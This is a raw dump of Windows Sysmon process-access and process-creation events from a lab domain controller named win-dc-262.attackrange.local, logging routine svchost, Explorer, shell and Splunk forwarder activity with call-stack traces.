16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180049Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180048Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180047Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180046Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180045Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180044Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180043Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180042Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180041Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180040Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180039Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180038Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180037Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180036Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180035Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180034Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180033Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180032Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:32.870{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180064Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45A-601A-3D30-00000000A301}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180063Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180062Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180061Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180060Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180059Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7CBD-6019-0500-00000000A301}640656C:\Windows\system32\csrss.exe{29E67E80-D45A-601A-3D30-00000000A301}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180058Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.917{29E67E80-7D64-6019-B000-00000000A301}11603872C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{29E67E80-D45A-601A-3D30-00000000A301}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000180057Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:34.918{29E67E80-D45A-601A-3D30-00000000A301}2400C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{29E67E80-7CBD-6019-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{29E67E80-7D64-6019-B000-00000000A301}1160C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000180073Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7D64-6019-B400-00000000A301}16482392C:\Windows\system32\conhost.exe{29E67E80-D45B-601A-3E30-00000000A301}6696C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180072Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180071Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:50:35.589{29E67E80-7CBF-6019-0C00-00000000A301}5884624C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180070Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 